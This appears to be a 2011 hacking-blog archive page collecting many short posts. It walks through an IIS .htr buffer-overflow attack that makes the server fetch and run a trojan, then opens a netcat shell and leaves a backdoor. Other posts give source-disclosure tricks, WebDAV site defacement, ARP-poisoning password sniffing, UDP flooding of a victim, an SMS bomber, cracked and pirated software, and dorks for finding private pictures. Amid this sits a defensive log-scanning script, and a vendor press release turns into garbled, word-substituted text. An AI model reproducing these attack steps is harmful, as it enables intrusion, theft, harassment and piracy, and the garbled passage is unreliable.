March 2011 | Learn Cyber Security

Learn How To Hack Web Servers

Hacking Tool: IISHack.exe

iishack.exe overflows a buffer used by IIS http daemon, allowing for arbitrary code to be executed.
c:\ iishack 80 is the IIS server you're hacking, 80 is the port its listening on, is some webserver with your trojan or custom script (your own, or another), and /thetrojan.exe is the path to that script.
"IIS Hack" is a buffer overflow vulnerability exposed by the way IIS handles requests with .HTR extensions. A hacker sends a long URL that ends with ".HTR". IIS interprets it as a file type of HTR and invokes the ISM.DLL to handle the request. Since ISM.DLL is vulnerable to a buffer overflow, a carefully crafted string can be executed in the security context of IIS, which is privileged. For example, it is relatively simple to include in the exploit code a sequence of commands that will open a TCP/IP connection, download an executable and then execute it. This way, any malicious code can be executed.
A sample exploit can be constructed as shown below:
To attack the target site, an attacker whose system is running a web server can use iishack.exe and ncx.exe.
To begin with, ncx.exe is configured to run from the root directory. iishack.exe is then run against the victim site.
c:\>iishack.exe  80 /ncx.exe 
The attacker can then use netcat to invoke the command shell:
c:\>nc  80 
He can proceed to upload and execute any code of his choice and maintain a backdoor on the target site.

IPP Buffer Overflow Countermeasures

  • Install latest service pack from Microsoft.
  • Remove IPP printing from IIS Server
  • Install firewall and remove unused extensions
  • Implement aggressive network egress filtering
  • Use IISLockdown and URLScan utilities
  • Regularly scan your network for vulnerable servers
Without any further explanation, the first countermeasure is obviously to install the latest service packs and hotfixes.
As with many IIS vulnerabilities, the IPP exploit takes advantage of a bug in an ISAPI DLL that ships with IIS 5 and is configured by default to handle requests for certain file types. This particular ISAPI filter resides in C:\WINNT\System32\msw3prt.dll and provides Windows 2000 with support for the IPP. If this functionality is not required on the Web server, the application mapping for this DLL to .printer files can be removed (optionally deleting the DLL itself as well) in order to prevent the buffer overflow from being exploited. This works because the DLL will then not be loaded into the IIS process when it starts up. In fact, most security issues are centered on the ISAPI DLL mappings, making this one of the most important countermeasures to adopt when securing IIS.
Another standard countermeasure that can be adopted here is to use a firewall and remove any extensions that are not required. Implementing aggressive network egress filtering can help to a certain degree.
With IIS, using IISLockdown and URLScan (free utilities from Microsoft) can provide more protection and minimize damage in case the web server is affected.
Microsoft has also released a patch for the buffer overflow, but removing the ISAPI DLL is a more proactive solution in case there are additional vulnerabilities that are yet to be found with the code.

ISAPI DLL Source disclosures

  • Microsoft IIS 4.0 and 5.0 can be made to disclose fragments of source code which should otherwise be inaccessible.
  • This is done by appending "+.htr" to a request for a known .asp (or .asa, .ini, etc.) file.
  • Appending this string causes the request to be handled by ISM.DLL, which then strips the "+.htr" string and may disclose part or all of the source of the .asp file specified in the request.
IIS supports several file types that require server-side processing. When a web site visitor requests a file of one of these types, an appropriate filter DLL processes it. A vulnerability exists in ISM.DLL, the filter DLL that processes .HTR files. HTR files enable remote administration of user passwords.
HTR files are scripts that allow Windows NT password services to be provided via IIS web servers. Windows NT users can use .HTR scripts to change their own passwords, and administrators can use them to perform a wide array of password administration functions. HTR is a first-generation advanced scripting technology that is included in IIS 3.0, and still supported by later versions of IIS for backwards compatibility. However, HTR was never widely adopted, and was superseded by Active Server Pages (ASP) technology introduced in IIS 4.0.

Attack Methods
Exploit / Attack Methodology
By making a specially formed request to IIS, with the name of the file followed by around 230 "%20" sequences (these represent spaces) and then ".htr", the client tricks IIS into thinking that it is requesting a ".htr" file. The .htr file extension is mapped to the ISM.DLL ISAPI application, and IIS redirects all requests for .htr resources to this DLL.
ISM.DLL is then passed the name of the file to open and execute, but before doing this ISM.DLL truncates the buffer sent to it, chopping off the .htr and a few spaces, and ends up opening the file whose source is sought. The contents are then returned. This attack can only be launched once, though, unless the web service is stopped and started. It will only work when ISM.DLL is first loaded into memory.
"Undelimited .HTR Request" vulnerability: The first vulnerability is a denial of service vulnerability. All .HTR files accept certain parameters that are expected to be delimited in a particular way. This vulnerability exists because the search routine for the delimiter isn't properly bounded. Thus, if a malicious user provided a request without the expected delimiter, the ISAPI filter that processes it would search forever for the delimiter and never find it.
If a malicious user submitted a password change request that lacked an expected delimiter, ISM.DLL, the ISAPI extension that processes .HTR files, would search endlessly for it. This would prevent the server from servicing any more password change requests. In addition, the search would consume CPU time, so the overall response of the server might be slowed.
The second threat would be more difficult to exploit. A carefully-constructed file request could cause arbitrary code to execute on the server via a classic buffer overrun technique. Neither scenario could occur accidentally. This vulnerability does not involve the functionality of the password administration features of .HTR files.
".HTR File Fragment Reading" vulnerability: The ".HTR File Fragment Reading" vulnerability could allow fragments of certain types of files to be read by providing a malformed request that would cause the .HTR processing to be applied to them. This vulnerability could allow a malicious user to read certain types of files under some very restrictive circumstances by levying a bogus .HTR request. The ISAPI filter will attempt to interpret the requested file as an .HTR file, and this would have the effect of removing virtually everything but text from a selected file. That is, it would have the effect of stripping out the very information that is most likely to contain sensitive information in .asp and other server-side files.
The .htr vulnerability will allow data to be added, deleted or changed on the server, or allow any administrative control on the server to be usurped. Although .HTR files are used to allow web-based password administration, this vulnerability does not involve any weakness in password handling.
"Absent Directory Browser Argument" vulnerability: Among the default HTR scripts provided in IIS 3.0 (and preserved on upgrade to IIS 4.0 and IIS 5.0) were several that allowed web site administrators to view directories on the server. One of these scripts, if called without an expected argument, will enter an infinite loop that can consume all of the system's CPU availability, thereby preventing the server from responding to requests for service.

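For defenders, the request shapes described above (a file name with "+.htr" appended, a file name padded with "%20" before ".htr", a very long URL ending in ".htr", and any hit on the .printer mapping) can be searched for in web server logs. The following is an added example, not part of the original post and not a Microsoft tool; the log field layout, the length threshold, the rule names and every sample log line are assumptions constructed for illustration.

```python
"""Flag .htr / .printer request shapes in W3C-style web server logs."""
import re
from urllib.parse import unquote

LONG_URL = 1024  # assumed cut-off for "a long URL that ends with .HTR"
HAS_EXT = re.compile(r"\.[a-z0-9]{1,5}$")


def classify(stem):
    """Return a rule name for a request path, or None if it is unremarkable."""
    lower = stem.lower()
    if lower.endswith(".printer"):
        # Any hit means the IPP ISAPI mapping is being probed or is in use.
        return "printer-mapping-hit"
    if not lower.endswith(".htr"):
        return None
    # Everything before the final ".htr", with %20 decoded to real spaces.
    base = unquote(lower[:-4])
    target = base.rstrip(" +")
    padding = len(base) - len(target)
    if padding and HAS_EXT.search(target):
        # Another file's name, then spaces or '+', then ".htr".
        return "htr-fragment-read"
    if len(stem) > LONG_URL:
        return "htr-long-url"
    # A plain .htr request: the ISM.DLL mapping is still reachable.
    return "htr-mapping-hit"


def scan(log_text):
    """Return (line_number, client_ip, rule) for every flagged request."""
    fields, findings = [], []
    for number, line in enumerate(log_text.splitlines(), 1):
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names announced by the log
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        rule = classify(row.get("cs-uri-stem", ""))
        if rule:
            findings.append((number, row.get("c-ip", "?"), rule))
    return findings


def build_sample_log():
    """Constructed sample data: one benign request and five flagged ones."""
    stems = [
        "/default.asp",
        "/global.asa+.htr",
        "/login.asp" + "%20" * 230 + ".htr",
        "/" + "A" * 3000 + ".htr",
        "/pwd/change.htr",
        "/null.printer",
    ]
    lines = ["#Fields: date time c-ip cs-method cs-uri-stem sc-status"]
    for i, stem in enumerate(stems):
        lines.append(f"2011-03-01 10:00:{i:02d} 192.0.2.{10 + i} GET {stem} 200")
    return "\n".join(lines)


if __name__ == "__main__":
    for number, client, rule in scan(build_sample_log()):
        print(f"line {number}: {client} -> {rule}")
```

On a server where the .htr and .printer mappings have been removed as the countermeasures recommend, every one of these findings is worth reviewing, since no legitimate client should be requesting those extensions.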

Core Security Integrates CORE IMPACT Pro with Metasploit Project

Core Security Technologies, provider of CORE IMPACT Pro, the most comprehensive product for proactive enterprise security testing, today announced that it has created a fully supported technical integration between its flagship software product and the Metasploit open-source exploit framework.

With today's organizations using penetration testing to strategically test their vulnerabilities and IT defenses, Core Security now offers both professional penetration testers and operational security staffers who use IMPACT Pro the ability to tap directly into the open-source functionality of Metasploit to carry out vulnerability analysis.

By providing the ability to use Metasploit in concert with IMPACT Pro, penetration testers will now be able to enjoy all the benefits of Core's commercial-grade, automated solution - with its massive repository of professionally developed exploits, efficient and easy-to-use interface and in-depth reporting capabilities - alongside the well-known open source project.

Through the integration, testers will now be able to:

1. Get a system compromised during testing with Metasploit into the IMPACT environment and deploy an IMPACT Pro Agent. The Agent is a patented, syscall proxy payload that allows users to:

    * Launch IMPACT Pro's full range of automated penetration testing capabilities from the compromised system.
    * Leverage IMPACT's wide selection of commercial-grade exploits, plus multiple pre- and post-exploitation capabilities for in-depth, comprehensive attack replication.
    * Pivot penetration tests to other systems, mimicking an attacker's attempts at identifying and exploiting paths of weakness to backend systems and data.

2. Use IMPACT Pro's automated Rapid Penetration Test (RPT) to exploit vulnerabilities, then launch Metasploit's db-autopwn feature and afterwards import the results back into IMPACT Pro. This allows users with less training and skill to view Metasploit testing data within the IMPACT environment.

"We've long respected the acquisition of H.D. Thespian, his team and the district of Metasploit contributors in creating a sumptuous tap hypothesis that offers practised testers a reach of capabilities, and we loved to egest it easier for those who require to use Metasploit alongside Set Outcome Pro to do so," said Fred Pinkett, vice chairwoman of fluid direction at Nucleus Warrantee. "By message paid testers and warrantee body greater power to centralize their assessments and united their Metasploit efforts into their Event Pro deployments, we think that we're providing the market with an enlarged opportunity to communicate out Change Pro-Metasploit combining gift officially come in the close version of CORE Alter Pro, due to board from Nucleus Certificate in Apr 2010.

"As someone who utilizes both CORE Fight Pro and Metasploit, it's invaluable to see Nucleus flying towards integrating in this way," said Steve Shead, Administrator of IT & Info Warrantee Functionary and at "It faculty make testers many orbit for umbrella investigation and categorization, and another boulevard of affliction checking by mercantilism Metasploit experimentation results position into Event Pro. It's pleasing to see Ngo targeting their development efforts into providing automatic onset investigation capabilities that are as stretched and propulsive as humanly workable; ultimately this agency t

"The compounding the Metasploit structure with Change Pro module define a new era for vulnerability agreement," said Chris Nickerson, CEO of Lares Consulting. "Adult onrush testers and enterprises similar present now help from the exploits of Metasploit while existence competent to investing the right profession and reporting of Touch Pro. The most reliable mercenary means merging with the extravasation furnish research of the subject inspiration community will surely be a hit for all."


{Linux} Tips and Tricks

Are you a Unix geek? Here are some indispensable Linux tips and tricks which are a must for new and experienced users alike. Let's take a look at them.

Speeding up your hard drive

Get faster file transfers by using 32-bit transfers on your hard drive

Just add the line:

    hdparm -c3 /dev/hdX

to a bootup script. If you use SuSE or other distros based on SYS V,


should work for you. This enables 32-bit transfers on your hard drive. On some systems it can improve transfer performance by 75%. To test your performance gain, type:

    hdparm -t -T /dev/hdX

More DOS-like commands
Many people are moving to Linux because they miss the stability of good old DOS. In that light, many users are typing DOS commands (which originated from UNIX in the first place) that look fine but cause errors. The command "cd.." in DOS is perfectly valid, but Linux balks. This is because "cd" is a command, and any parameter for that command must be separated from the command by a space. Use a text editor in your home directory to edit the file ".bashrc". The period is there on purpose; this hides the file from the normal ls display.

Add the lines:

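    # Current bash versions reject alias names containing '/', so the
    # first line only works in older shells.
    alias cd/="cd /"
    alias cd~="cd ~"
    alias cd..="cd .."

And I usually add these...

    alias md="mkdir"
    # rmdir has no -i option, so rd maps to plain rmdir
    alias rd="rmdir"
    alias rm="rm -i"

and my first and still favorite alias...

    alias ls="ls --color"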

alias is a powerful tool, and can be used in the .bashrc script as well as from the command line. You can, if you want to spend the time, create your own group of shell commands to suit how you work. As long as you put them in your .bashrc file, they'll be there every time you log in. Note that if you frequently log in as root, you might want to copy /home/username/.bashrc to /root/.bashrc to keep yourself sane.

Setting your timezone
The timezone under Linux is set by a symbolic link from /etc/localtime[1] to a file in the /usr/share/zoneinfo[2] directory that corresponds with what timezone you are in. For example, since I'm in South Australia, /etc/localtime is a symlink to /usr/share/zoneinfo/Australia/South. To set this link, type:

    ln -sf ../usr/share/zoneinfo/your/zone /etc/localtime

Replace your/zone with something like Australia/NSW or Australia/Perth. Have a look in the directories under /usr/share/zoneinfo to see what timezones are available.

   1. This assumes that /usr/share/zoneinfo is linked to /etc/localtime as it is under Red Hat Linux.
   2. On older systems, you'll find that /usr/lib/zoneinfo is used instead of /usr/share/zoneinfo. See also the later section ``The time in some applications is wrong''.

How to do backup with tar?
You can maintain a list of files that you wish to back up in a file and tar it when you wish.

    tar czvf tarfile.tar.gz -T list_file

where list_file is a simple list of what you want to include in the tar


    /etc/ppp (all files into the /etc/ppp directory)

How to keep a computer from answering to ping?

A simple "echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all" will do the trick... to turn it back on, simply

    "echo 0 > /proc/sys/net/ipv4/icmp_echo_ignore_all"

Stay tuned for more tips and tricks.



Use SSH Tunneling to surf net invisibly

Unable to surf the net at work or college? Want to surf the net invisibly? Well, we have a solution for that: SSH tunneling. An SSH tunnel is an encrypted tunnel created through an SSH protocol connection. SSH tunnels may be used to tunnel unencrypted traffic over a network through an encrypted channel. In plain language, you can surf the net without being monitored and even reach blocked sites too. SSH is pretty awesome.
Without leaving your seat, you have a way to control a computer which may be located anywhere on this planet. And if you have access to a PC with an SSHd installed, you can channel your traffic through that computer, which is particularly useful in situations when:
  1. The site is normally inaccessible from your current location (School/Work)
  2. You do not want your connection monitored (You’re using a WiFi hotspot/You’re in a country that monitors/censors your internet usage)
In this tutorial, I will be using Firefox on Gentoo Linux, but it is applicable to all distributions of Linux.
Step One: Setting Up the Tunnel
All common Linux distributions come with openssh packages. To check whether you have ssh installed already, type the command "which ssh". Gentoo has the openssh package preinstalled, so no tension :)
First we need to SSH to the server that we want to tunnel through. Open up a terminal and type the following command:
ssh -ND @
Replace with a port number of your choice; this will be the LOCAL port which Firefox will use to tunnel the traffic later on. Try to choose a high and random port number so that nobody scans or sneaks into it (system admins and firewalls).
Practical Example:
ssh -ND 2945 [email protected]
Now enter your password as usual. The session will hang after authentication, which is perfectly normal as it isn't an interactive session. Now minimize the terminal and open Firefox.
Step Two: Configuring Firefox
In Firefox, go to one of the following (depending upon which version you are using):
Preferences -> Advanced -> Network -> Connection Settings
Tools -> Options -> Advanced -> Network -> Settings
A new window should appear. Select the "Manual Proxy Configuration" option; you'll need to type some information in the 'SOCKS Host' section.
Host: localhost
Port: the port you used in the SSH command earlier.
Save your changes. Just to make sure it worked, check your IP with an online IP checker :)

Happy Surfing


Beaver's SMS Bomber Pro

Features Include:
Full Feature List:
Custom SMTP Server (Make Sure You Type It Right)
Custom Carrier Gateway (If Your Victims Gateway Is Not In The Large List You May Find And Enter it Yourself)
Custom Number Of SMS To Send (Finally Have Where You Can Enter Any Amount To Send)
Save/Load Settings (Will Save Everything You Enter In The Fields, Restarting Your Computer Will Lose The Saved Settings)
Fixed XP GUI Issues
Stop Bombing At Any Time
Watch The Number Of SMS Sent In The Title Bar
No Longer Freezes While Sending
Added A Recent slave's Box Where You Can Select An Entry And Right-Click It To Bomb It Again Or Delete It From The List
Save/Load Recent Victims List

GMail Is The Default SMTP Server That Is Used Which Has A Limit On The Number That Can Be Sent
Has A Lot Of Carriers Already Pre-Entered For You.
SMS Looks Like

FRM: Senders Email
SUBJ: Subject
MSG: Message

What Is New In The Pro Version:
Error Handling, For Example If There Was An Error Sending The Message It Will Ask You If You Want To Change The E-mail/Password You Are Using. This Is Just One Of The Many Error Handling I Have Added.

Hack about 80% of every website out there

All right,
You kids need to stop asking for someone else to hack your "friend's" forum, your girlfriend's MySpace page, etc.

You want to learn to hack, stop asking stupid questions.

There is ONE tool, that was created originally to protect from hackers. Unfortunately, it's one of the best friends a hacker will ever have :

It's called Acunetix.

Acunetix is a tool that scans websites for known vulnerabilities. It will list all possible sql, xss, html injections, all java injections, all passwords and database weaknesses, all ftp weaknesses, etc. All form submissions exploits that the website can be targeted with. Remote upload and download vulnerabilities.

It will work in 80% of the cases, its database is updated regularly, but websites with latest updates and a good admin might not be targetable.

So here's the thing. Before you post anymore questions such as : "Can this website be hacked ?" or "How do I hack this forum ?", download Acunetix in the link below (I couldn't be bothered uploading a new one).

Acunetix Full Version HERE

(Uploaded by me, 100% clean)

Simply install it and copy the crack folder content into your Acunetix folder (replace files), and when you start the program, click on New Scan, follow the steps.

It will answer most of your questions. Take any known website, scan them and you'll find lots of little "medium risk" security problems etc. The program will explain what the potential harms are, not how to do them. The rest is up to you, do a bit of research, learn by yourself.

So use Acunetix, and stop asking stupid things that just make people think you have a pea for a brain.

Oh, and last tip : is your friend. Don't forget it before you ask anything else.
Adnan Anjum


Darkjumper v5.8 Sqli,Lfi,Rfi,Rce scanner

Darkjumper is a free tool that will try to find every website hosted on the same server as your target, then check each website hosted on that server for vulnerabilities.

Here are some key features of "Darkjumper":

· scan sql injection, rfi, lfi, blind sql injection
· autosql injector
· proxy support
· verbosity
· autoftp bruteforcer
· IP or Proxy checker and GeoIP


· Python


Bypass Websense or Cyberoam

Hello friends, today I am going to explain how to hack Cyberoam, Websense and all the other security firewalls that colleges, institutions and offices use to block websites. Many of my users have asked me how to access blocked websites in their colleges and offices. I have explained this earlier, but those loopholes are now fixed and those methods to hack Cyberoam and Websense don't work effectively now. Hacking through a proxy is also quite tedious, as we have to search for working proxy websites, which is itself a very tedious task, and these don't always work. But the method that I will explain today is really awesome, doesn't require much work, is quite easy and, most importantly, is 100% working. So friends, read on for the detailed hack....

For hacking Cyberoam or Websense you must know how Cyberoam and Websense work. If you know how they work, then you can easily find flaws in them and hack them very easily.

Cyberoam is an 8-layer hardware firewall that offers stateful and deep packet inspection for network and web applications, and user-based identity security. Thus the firewall is quite secure. How we can hack that 8-layer security is the main question here. As I have mentioned above, the main work of blocking any website or application in Cyberoam is done at the deep packet inspection step, and this is where the flaw in any security firewall lies, Cyberoam and Websense included. They block websites by parsing their content, and if the content contains restricted keywords they block those websites. They also use category blocking, which works on the same concept. The flaw is with websites that use SSL: websites that show the SSL lock, i.e. websites that use https, are not blocked by them. They have to block these websites manually, which is a very hectic task, and believe me, nobody blocks them.

So the proxy websites that use https, i.e. SSL proxies, are also not blocked by these firewalls.

Only those proxies are blocked which are known or heavily used. But the tool that I give you creates SSL proxies by itself, which means its proxies cannot be blocked. So friends, this tool rocks.
Things that we need to hack Cyberoam, Websense and any such hardware firewall:

1. TOR browser (an anonymous web browser like Mozilla which has an inbuilt proxy finder that easily gets past the blocks applied to websites by Cyberoam or Websense).

2. A USB or pendrive ( where you will keep the portable version of TOR browser)

3. If USB drives are disabled we will use different drive for its installation. (also portable version of TOR can be executed from any place).
Steps to hack Cyberoam:

1. Download the TOR web browser.

To download TOR browser: CLICK HERE

2. Now install the TOR web browser. In case of portable version it will extract.

For Installation and usage Instructions visit here: CLICK HERE

3. Now open the TOR browser and start surfing your favorite websites like facebook, orkut, gmail... everything at your office....
4. That's all the hack. I hope you all have liked it.
For such hacks keep visiting...and subscribe our posts, if you don't wanna miss any such hack....
Adnan Anjum


Use Google to get almost any software's serial no [Mr.MindfReak]

Use Google to get Serial No of any Software
Most people download a trial and use it, and only after the trial expires do they look for a crack, serial no, keygen, patch....

But many don't know where to get a serial no, and some websites may infect your system with Trojan horses, viruses, adware, spyware....

So for beginners this is a simple way to find one with less effort, and it saves time too. But make sure you have antivirus activated before trying to get serials or patches, to avoid data loss.

Just follow the steps as instructed below

1) Go to Google
2) type this syntax in search bar " 94FBR"
3) Replace Product name with desired software and leave a space then type 94FBR
4) Press enter, thats it

Now you receive many pages which contain serial nos, cracks, patches....

Just give it a try; this simple trick works for many people.

Demo: 94fbr office 2007
(It will list the pages containing the keys for Office 2007)


Google trick to find private pictures!

Maybe you are a "voyeur".

Maybe you need some pictures for your school work.

Of course you can go to a dedicated website where you can find lot of free pictures.

But you can also dig some private pictures directories.

Try this little code in Google, you may find lot of Non public pictures
intitle:index.of +"Indexed by Apache::Gallery"
search by adding a word at the end, for example:

intitle:index.of +"Indexed by Apache::Gallery" +paris
I just realised that maybe some of you guys use Apache Gallery for your own private pictures.

If you want to verify whether your own private pictures are indexed, just paste this code in Google.

site:www.YourSite intitle:index.of +"Indexed by Apache::Gallery"
(Replace YourSite with the server hosting your pictures, i.e. your URL.)


IIS EXPLOIT [For Xp And Win7]

Steps for Xp-
# open run
# type-
%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}
and press enter !
#A new window name "WEB FOLDER" gets open
#Right click and click on New, Add Web Folder then enter your vulnerable website address.
#then next….finish
# now You can insert your page with name index.html by simply copy pasting.
Also, after getting access to the website, many websites don't allow you to add your page, so leave them.
#Dork- "Powered by IIS" or use your own unique dork.
Windows 7-
#Click Start.
#Click Computer.
# In the following dialog click Map Network Drive.
# On the Map Network Drive dialog, click "Connect to a Web site that you can use to store your documents and Pictures" this will pop up the "Welcome to the Add Network Location Wizard".
# Click on Next.
# Click on ”Choose a custom network location”.
# Click on Next.
# Now type the web folder address that you want to access.
# Enter a NAME to help you identify the web folder and click Next.
# Place a checkmark on ‘Open this network location when I click finish’.
# Click Finish.
and insert your deface page !!


How To Sniff Passwords With Cain And Abel

Download Cain and Abel Here: Cain & Abel
Run Cain and Abel as administrator
Go to the tab that says Sniffer
Go to the upper right corner under the Cain picture and enable the sniffer
Select your adapter (usually the one that has a listed IP address)
Click on the blue plus sign
Leave everything as is and press OK
Right click on each of the IP addresses that come up
Resolve the host name for each one of them
Go to the bottom of the screen and hit the APR tab
Click on the top box
Click the blue plus sign
Find the computer you want to get passwords/information from in the left hand box
Highlight everything that comes up in the right hand box
Go to the upper right hand corner, by the sniffer, and enable the APR poisoner
To find passwords, go to the bottom of the screen where it says Passwords
Here you will find all usernames and passwords of the person you have poisoned (most of the passwords will be in HTTP)


How to use Net-Tools! Best Tool Ever!

The definition of Net Tools
Net Tools is cutting-edge security and network monitoring software for the Internet and Local Area Networks, providing clients with the ability and confidence to meet the challenges of tomorrow's technology. Keeping pace with the industry trends, we offer professional tools that support the latest standards, protocols, software, and hardware for both wired and wireless networks. The main goal is the creation of high quality software. Net Tools is a very strong combination of network scanning, security, file, system, and administrator tools useful in diagnosing networks and monitoring your PC and computer's network connections for system administrators. Next to the essential core tools it includes a lot of extra valuable features. It’s a Swiss Army knife for everyone interested in a set of powerful network tools for everyday use. This all-in-one toolkit includes also a lot of handy file and system utilities next to the huge amount of network tools. The menus are fully configurable, so in this way you won’t get lost in the extremely large amount of essential tools. All the additional features will make this application a must have for all system administrators. There are numerous constructive and valuable applications included in Net Tools that can be used for a great amount of purposes. The latest version of Net Tools is hybrid; it means that it’s capable of working together with applications that are made and designed for Net Tools, so in this way more flexibility and user-friendliness is obtained. This software is designed for the Microsoft Windows OS (Windows 98, NT, 2000, 2003, XP, Vista). It’s entirely compatible and has thoroughly been tested on Windows XP. With the 175+ tools it is a great collection of useful tools for network users. The size of Net Tools 5.0.70 is approximately 25 Mb.


Some features of Net Tools

Net Tools 5.0 (build 70) contains a whole variety of network tools.

1) IP Address Scanner
2) IP Calculator
3) IP Converter
4) Port Listener
5) Port Scanner
6) Ping
7) NetStat (2 ways)
8) Trace Route (2 ways)
9) TCP/IP Configuration
10) Online - Offline Checker
11) Resolve Host & IP
12) Time Sync
13) Whois & MX Lookup
14) Connect0r
15) Connection Analysator and protector
16) Net Sender
17) E-mail seeker
18) Net Pager
19) Active and Passive port scanner
20) Spoofer
21) Hack Trapper
22) HTTP flooder (DoS)
23) Mass Website Visiter
24) Advanced Port Scanner
25) Trojan Hunter (Multi IP)
26) Port Connecter Tool
27) Advanced Spoofer
28) Advanced Anonymous E-mailer
29) Simple Anonymous E-mailer
30) Anonymous E-mailer with Attachment Support
31) Mass E-mailer
32) E-mail Bomber
33) E-mail Spoofer
34) Simple Port Scanner (fast)
35) Advanced Netstat Monitoring
36) X Pinger
37) Web Page Scanner
38) Fast Port Scanner
39) Deep Port Scanner
40) Fastest Host Scanner (UDP)
41) Get Header
42) Open Port Scanner
43) Multi Port Scanner
44) HTTP scanner (Open port 80 subnet scanner)
45) Multi Ping for Cisco Routers
46) TCP Packet Sniffer
47) UDP flooder
48) Resolve and Ping
49) Multi IP ping
50) File Dependency Sniffer
51) EXE-joiner (bind 2 files)
52) Encrypter
53) Advanced Encryption
54) File Difference Engine
55) File Comparasion
56) Mass File Renamer
57) Add Bytes to EXE
58) Variable Encryption
59) Simple File Encryption
60) ASCII to Binary (and Binary to ASCII)
61) Enigma
62) Password Unmasker
63) Credit Card Number Validate and Generate
64) Create Local HTTP Server
65) eXtreme UDP Flooder
66) Web Server Scanner
67) Force Reboot
68) Webpage Info Seeker
69) Bouncer
70) Advanced Packet Sniffer
71) IRC server creater
72) Connection Tester
73) Fake Mail Sender
74) Bandwidth Monitor
75) Remote Desktop Protocol Scanner
76) MX Query
77) Messenger Packet Sniffer
78) API Spy
79) DHCP Restart
80) File Merger
81) E-mail Extractor (crawler / harvester bot)
82) Open FTP Scanner
83) Advanced System Locker
84) Advanced System Information
85) CPU Monitor
86) Windows Startup Manager
87) Process Checker
88) IP String Collecter
89) Mass Auto-Emailer (Database mailer; Spammer)
90) Central Server (Base Server; Echo Server; Time Server; Telnet Server; HTTP Server; FTP Server)
91) Fishing Port Scanner (with named ports)
92) Mouse Record / Play Automation (Macro Tool)
93) Internet / LAN Messenger Chat (Server + Client)
94) Timer Shutdown/Restart/Log Off/Hibernate/Suspend/ Control
95) Hash MD5 Checker
96) Port Connect - Listen tool
97) Internet MAC Address Scanner (Multiple IP)
98) Connection Manager / Monitor
99) Direct Peer Connecter (Send/Receive files + chat)
100) Force Application Termination (against Viruses and Spyware)
101) Easy and Fast Screenshot Maker (also Web Hex Color Picker)
102) COM Detect and Test
103) Create Virtual Drives
104) URL Encoder
105) WEP/WPA Key Generator
106) Sniffer.NET
107) File Shredder
108) Local Access Enumerater
109) Steganographer (Art of hiding secret data in pictures)
110) Subnet Calculater
111) Domain to IP (DNS)
112) Get SNMP Variables
113) Internet Explorer Password Revealer
114) Advanced Multi Port Scanner
115) Port Identification List (+port scanner)
116) Get Quick Net Info
117) Get Remote MAC Address
118) Share Add
119) Net Wanderer
120) WhoIs Console
121) Cookies Analyser
122) Hide Secret Data In Files
123) Packet Generator
124) Secure File Splitting
125) My File Protection (Password Protect Files, File Injections)
126) Dynamic Switch Port Mapper
127) Internet Logger (Log URL)
128) Get Whois Servers
129) File Split&Merge
130) Hide Drive
131) Extract E-mails from Documents
132) Net Tools Mini (Client/Server, Scan, ICMP, Net Statistics, Interactive, Raw Packets, DNS, Whois, ARP, Computer's IP, Wake On LAN)
133) Hook Spy
134) Software Uninstaller
135) Tweak & Clean XP
136) Steganographic Random Byte Encryption
137) NetTools Notepad (encrypt your sensitive data)
138) File Encrypter/Decrypter
139) Quick Proxy Server
140) Connection Redirector (HTTP, IRC, ... All protocols supported)
141) Local E-mail Extractor
142) Recursive E-mail Extractor
143) Outlook Express E-mail Extractor
144) Telnet Client
145) Fast Ip Catcher
146) Monitor Host IP
147) FreeMAC (MAC Address Editor)
148) QuickFTP Server (+user accounts support)
149) NetTools Macro Recorder/Player (Keybord and Mouse Hook)
150) Network Protocol Analyzer
151) Steganographic Tools (Picture, Sounds, ZIP Compression and Misc Methods)
152) WebMirror (Website Ripper)
153) GeoLocate IP
154) Google PageRank Calculator
155) Google Link Crawler (Web Result Grabber)
156) Network Adapter Binder
157) Remote LAN PC Lister
158) Fast Sinusoidal Encryption
159) Software Scanner
160) Fast FTP Client
161) Network Traffic Analysis
162) Network Traffic Visualiser
163) Internet Protocol Scanner
164) Net Meter (Bandwidth Traffic Meter)
165) Net Configuration Switcher
166) Advanced System Hardware Info
167) Live System Information
168) Network Profiler
169) Network Browser
170) Quick Website Maker and Web Gallery Creator
171) Remote PC Shutdown
172) Serial Port Terminal
173) Standard Encryptor
174) Tray Minimizer
175) Extra Tools (nmap console & win32 version)

Many extra features and utilities are included in this package!

Now, let's show you how to use some of my favorite tools!

The IP Sniffer!
Well, first of all you want to open Net-Tools.
Now click on Start > Exterior Tools > Internet Tools > Advanced Packet Sniffer.
Now a window should pop up. From there, do you see the three tabs under "Start Logging"? Click on UDP.
Now open the chat window you are using to talk with someone. I believe it can be used with almost anything [just make sure you don't have any background programs running]. Once you have the chat open, click on "Start Logging" and type to him. As soon as you do that, click "Stop Logging". Now the IP that isn't yours should be the victim's. If there are multiple IPs, just look for the one that appears the most.

The UDP Flooder!
Go to Start > Network Tools and scroll down a bit until you see "UDP Flooder".
This tool can actually be used to DoS someone! An actual computer!
The only downfall is that you must have a dedicated box, which costs... eh, somewhere around $80 a month.
If you do have a box, just put Net Tools on the box.
Once you have Net Tools on your box, enter the victim's IP, enter some random data such as [jklsahdakljsdh] and copy and paste it like TWO times. Put the speed to 10 and click Start!
NOTICE** This cannot be used on your PC, not strong enough! Must be used with a dedicated box.

Tutorial IRC Trojan!
Start > System Tools > Tut IRC Trojan.

Add bytes to a .exe!

Start > File Tools > Add Bytes to .EXE
And MANY MANY more! There are hundreds of tools!


Windows 7 ™ SP1 32&64 Genuine

[Mega] Windows 7 ™ SP1 32&64 Genuine [All Parts By -Mr.Mindfreak™]


This is the most complete release, which includes all available versions of Windows 7 (except "N" and "E" editions):



Service Pack 1
Microsoft released the first official service pack for Windows 7 on February 22, 2011. This is an important update that includes previously released security, performance, and stability updates for Windows 7. SP1 also includes new improvements to features and services in Windows 7, such as improved reliability when connecting to HDMI audio devices, printing using the XPS Viewer, and restoring previous folders in Windows Explorer after restarting.
Windows 7 Service Pack 1 is an update that does the following :

- Helps keep PCs supported.
- Provides ongoing improvement to the operating system, by including previous updates delivered over Windows Update as well as continuing incremental updates to the Windows 7 platform based on customer and partner feedback.
- Makes it easy for organizations to deploy a single set of updates.

How to install:

- Extract using WinRAR.
- Use ImgBurn* to burn the extracted ISO file called "faXcooL.Windows.7.SP1.ENG.x86-x64.ACTiVATED".
* You can use any other software for this operation (Nero, Alcohol, CloneCD...).
* Burning speed should not be faster than 4x.
- Restart your computer*.
